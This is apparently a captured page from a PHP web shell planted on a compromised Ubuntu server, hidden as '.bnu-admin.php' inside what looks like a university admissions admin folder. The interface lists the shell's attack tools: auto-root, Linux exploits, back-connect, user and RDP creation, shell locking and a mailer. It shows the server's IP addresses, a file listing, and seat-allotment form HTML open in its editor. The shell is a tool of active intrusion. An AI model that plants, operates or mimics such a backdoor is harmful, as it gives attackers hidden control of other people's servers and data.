Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.142.135.24
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
bnu-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.bnu-admin.php
3.61
KB
-rw-r--r--
MainPage.html
12.72
KB
-rwxrwxrwx
admconfirmation.html
8.43
KB
-rwxrwxrwx
admorder_ru.html
3.17
KB
-rw-rw-r--
appdetails.html
0
B
-rwxrwxrwx
applicationview.html
5.42
KB
-rwxrwxrwx
applicationview_bkp.html
69.28
KB
-rwxrwxrwx
change-password.html
3.91
KB
-rwxrwxrwx
collegedetails.html
777
B
-rwxrwxrwx
create-user.html
5.02
KB
-rwxrwxrwx
degreedetails.html
772
B
-rwxrwxrwx
documentverification.html
27.51
KB
-rwxrwxrwx
dudseatallotsingal.html
9.2
KB
-rw-rw-r--
editapp.html
3.85
KB
-rw-rw-r--
home.html
756
B
-rwxrwxrwx
index.html
6.52
KB
-rwxrwxrwx
intake.html
1.85
KB
-rwxrwxrwx
merit_list.html
1.24
KB
-rwxrwxrwx
preseatallot.html
2.82
KB
-rw-rw-r--
preseatallot2.html
2.82
KB
-rw-rw-r--
provisinalsellist.html
3.83
KB
-rw-rw-r--
reports.html
5.13
KB
-rwxrwxrwx
rostertable.html
2.03
KB
-rwxrwxrwx
seatallotment.html
2.43
KB
-rwxrwxrwx
seatmatrix.html
2.08
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dudseatallotsingal.html
<div class="row clearfix"> <div class="card" id="apphead" hidden> <div class="header" style=" background: linear-gradient(to right, #15757c, #15955b); margin-top: 10px; " > <h2> <b style="color: #fff;">Acknowledge Application</b> <div style="float: right;"> <button type="button" class="btn btn-primary waves-effect m-l-5" onclick="studentback()" > Back </button> </div> </h2> </div> </div> <div id="application"></div> <div class="card" id="add"> <div class="header"> <h2> <b>Application View</b> </h2> </div> <div class="body" id = "fisrtdivx" style="padding: 20px;"> <form class="form-horizontal" id="fisrtdiv"> <div class="row clearfix"> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Applied Degree</b> </label> <div class="form-group"> <select id="fdeptt" class="form-control"> <option></option> </select> <input id="hfdeptt" type="hidden" value = "" class="form-control" placeholder="degree" /> </div> </div> </div> <div class="row clearfix"> <div class="col-lg-3 col-md-2 col-sm-4 col-xs-5 " > <button type="button" class="btn btn-primary waves-effect" onclick="loadStudPreseat()" > Submit </button> </div> </div> <div id = "appsum"> </div> <br> </form> </div> </div> <div class="card" id="next"> <input type="hidden" id="screen" value="next" /> <br> <div class="header"> <h2> <b>Application Details</b> <button type="button" class="btn btn-primary waves-effect pull-right" onclick="loadBackSeatAllotSingal()" > Back </button> </h2> </div> <div class="body" style="padding: 20px;"> <div class="row clearfix" id="appdet"> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">App. No.</b> </label> <div class="form-group"> <input id="appno" class="form-control" placeholder="App. No." disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Name</b> </label> <div class="form-group"> <input id="name" class="form-control" placeholder="Name" disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Cat. Code</b> </label> <div class="form-group"> <select onchange="getstudfee()" disabled id="catcode" class="form-control"> <option>--Select--</option> <option>GM</option> <option>CAT-I</option> <option>IIA</option> <option>IIB</option> <option>IIIA</option> <option>IIIB</option> <option>SC</option> <option>ST</option> </select> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">University</b> </label> <div class="form-group"> <input id="unistud" class="form-control" placeholder="Univ. Student" disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Rank</b> </label> <div class="form-group"> <input id="rank" class="form-control" placeholder="Rank" disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Applied Degree</b> </label> <div class="form-group"> <select onchange="getcollegedet(),getallotcat()" id="degree" class="form-control"> <option></option> </select> <input id="hdegree" type="hidden" class="form-control" placeholder="degree" /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">College</b> </label> <div class="form-group"> <select onchange="getstudfee(),getallotcat()" id="college" class="form-control"> <option></option> </select> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Seat Type</b> </label> <div class="form-group"> <select onchange="getstudfee(),getallotcat()" id="seattype" class="form-control"> <option>Merit Quota</option> <option>Payment Quota</option> </select> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Alloting Category</b> </label> <div class="form-group"> <select onchange="getpendingseats()" id="allcat" class="form-control"> <option></option> </select> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Pending Seats</b> </label> <div class="form-group"> <input id="pendseats" value = "0" class="form-control" placeholder="Pending Seats" disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Payment Type</b> </label> <div class="form-group"> <select id="paytype" class="form-control"> <option>Online</option> <option>Challan</option> </select> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Amount</b> </label> <div class="form-group"> <input id="amount" class="form-control" placeholder="Amount" disabled /> </div> </div> <div class="col-sm-6 col-md-6"> <label class="pull-left" for="daterange"> <b style="font-size: 17px;">Fee To be Paid</b> </label> <div class="form-group"> <input id="pamount" class="form-control" placeholder="Fee To be Paid" disabled /> </div> </div> <div> <center> <button type="submit" style=" font-weight: 600; font-size: 16px; padding-left: 30px; padding-right: 30px; " class="btn btn-warning waves-effect btn-lg" onclick="SaveDudSeatAllot()" > Save </button> </center> </div> </div> </div> </div> </div> <!-- <div class="row clearfix" id="submitButton" > <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12" style="padding-left: 0px;" > <div class="card"> <div class="body"> <div class="demo-radio-button" id="vfdi" name="vfdi" required> <center> <input name="vfd" type="checkbox" value="T" id="vfd" autocomplete="off" required /> <label for="vfd" ><b style="font-size: 16px;">Acknowledged and Verified</b></label > </center> </div> </div> </div> </div> </div> -->
Close